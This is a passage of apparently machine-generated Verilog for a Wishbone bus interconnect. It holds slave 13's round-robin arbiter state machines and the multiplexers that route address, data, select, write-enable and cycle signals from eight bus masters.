                    if ( s13_msel_arb2_req[6] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[7] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[0] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[1] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[2] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[3] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant5:
        begin
            if (  !( s13_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[6] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[7] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[0] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[1] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[2] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[3] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[4] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant6:
        begin
            if (  !( s13_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[7] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[0] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[1] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[2] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[3] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[4] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[5] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant7:
        begin
            if (  !( s13_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[0] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[1] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[2] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[3] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[4] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[5] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[6] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s13_msel_arb3_req = { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd3 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd3 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd3 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd3 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd3 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd3 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd3 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s13_msel_arb3_state <= s13_msel_arb3_grant0;
        end
        else
        begin 
            s13_msel_arb3_state <= s13_msel_arb3_next_state;
        end
    end
    always @ (  s13_msel_arb3_state or  { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd3 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd3 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd3 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd3 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd3 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd3 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd3 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s13_msel_arb3_next_state = s13_msel_arb3_state;
        case ( s13_msel_arb3_state ) 
        s13_msel_arb3_grant0:
        begin
            if (  !( s13_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[1] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[2] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[3] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[4] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[5] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[6] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[7] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant1:
        begin
            if (  !( s13_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[2] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[3] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[4] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[5] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[6] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[7] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[0] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant2:
        begin
            if (  !( s13_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[3] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[4] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[5] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[6] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[7] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[0] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[1] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant3:
        begin
            if (  !( s13_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[4] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[5] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[6] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[7] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[0] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[1] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[2] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant4:
        begin
            if (  !( s13_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[5] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[6] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[7] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[0] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[1] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[2] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[3] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant5:
        begin
            if (  !( s13_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[6] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[7] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[0] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[1] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[2] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[3] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[4] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant6:
        begin
            if (  !( s13_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[7] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[0] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[1] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[2] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[3] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[4] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[5] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb3_grant7:
        begin
            if (  !( s13_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s13_msel_arb3_req[0] ) 
                begin
                    s13_msel_arb3_next_state = s13_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s13_msel_arb3_req[1] ) 
                    begin
                        s13_msel_arb3_next_state = s13_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s13_msel_arb3_req[2] ) 
                        begin
                            s13_msel_arb3_next_state = s13_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s13_msel_arb3_req[3] ) 
                            begin
                                s13_msel_arb3_next_state = s13_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s13_msel_arb3_req[4] ) 
                                begin
                                    s13_msel_arb3_next_state = s13_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb3_req[5] ) 
                                    begin
                                        s13_msel_arb3_next_state = s13_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb3_req[6] ) 
                                        begin
                                            s13_msel_arb3_next_state = s13_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s13_msel_pri_out or  s13_msel_arb0_state or  s13_msel_arb1_state)
    begin
        if ( s13_msel_pri_out[0] ) 
        begin
            s13_msel_sel1 = s13_msel_arb1_state;
        end
        else
        begin 
            s13_msel_sel1 = s13_msel_arb0_state;
        end
    end
    always @ (  s13_msel_pri_out or  s13_msel_arb0_state or  s13_msel_arb1_state or  s13_msel_arb2_state or  s13_msel_arb3_state)
    begin
        case ( s13_msel_pri_out ) 
        2'd0:
        begin
            s13_msel_sel2 = s13_msel_arb0_state;
        end
        2'd1:
        begin
            s13_msel_sel2 = s13_msel_arb1_state;
        end
        2'd2:
        begin
            s13_msel_sel2 = s13_msel_arb2_state;
        end
        2'd3:
        begin
            s13_msel_sel2 = s13_msel_arb3_state;
        end
        endcase
    end
    assign s13_mast_sel = ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s13_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s13_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s13_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s13_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s13_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s13_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s13_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s13_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s13_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s13_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s13_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s13_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s13_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s13_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s13_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s13_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s13_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s13_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s13_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s13_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s13_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s13_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s13_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s13_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s13_m0_data_o = s13_data_i;
    assign s13_m1_data_o = s13_data_i;
    assign s13_m2_data_o = s13_data_i;
    assign s13_m3_data_o = s13_data_i;
    assign s13_m4_data_o = s13_data_i;
    assign s13_m5_data_o = s13_data_i;
    assign s13_m6_data_o = s13_data_i;
    assign s13_m7_data_o = s13_data_i;
    always @ (  ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s13_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s13_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s13_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s13_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s13_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s13_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s13_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s13_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s13_m0_cyc_r <= m0_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m1_cyc_r <= m1_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m2_cyc_r <= m2_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m3_cyc_r <= m3_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m4_cyc_r <= m4_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m5_cyc_r <= m5_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m6_cyc_r <= m6_s13_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s13_m7_cyc_r <= m7_s13_cyc_o;
    end
    always @ (  ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) or  m0_s13_cyc_o or  m1_s13_cyc_o or  m2_s13_cyc_o or  m3_s13_cyc_o or  m4_s13_cyc_o or  m5_s13_cyc_o or  m6_s13_cyc_o or  m7_s13_cyc_o or  s13_m0_cyc_r or  s13_m1_cyc_r or  s13_m2_cyc_r or  s13_m3_cyc_r or  s13_m4_cyc_r or  s13_m5_cyc_r or  s13_m6_cyc_r or  s13_m7_cyc_r)
    begin
        case ( ( ( ( s13_pri_sel == 2'd0 ) ) ? ( s13_arb_state ) : ( ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( s13_msel_arb0_state ) : ( ( ( ( s13_msel_pri_sel == 2'd1 ) ) ? ( s13_msel_sel1 ) : ( s13_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s13_wb_cyc_o = ( m0_s13_cyc_o & s13_m0_cyc_r );
        end
        3'd1:
        begin
            s13_wb_cyc_o = ( m1_s13_cyc_o & s13_m1_cyc_r );
        end
        3'd2:
        begin
            s13_wb_cyc_o = ( m2_s13_cyc_o & s13_m2_cyc_r );
        end
        3'd3:
        begin
            s13_wb_cyc_o = ( m3_s13_cyc_o & s13_m3_cyc_r );
        end
        3'd4:
        begin
            s13_wb_cyc_o = ( m4_s13_cyc_o & s13_m4_cyc_r );
        end
        3'd5:
        begin
            s13_wb_cyc_o = ( m5_s13_cyc_o & s13_m5_cyc_r );
        end
        3'd6:
        begin
            s13_wb_cyc_o = ( m6_s13_cyc_o & s13_m6_cyc_r );
        end
        3'd7:
        begin
            s13_wb_cyc_o = ( m7_s13_cyc_o & s13_m7_cyc_r );
        end
        endcase
    end
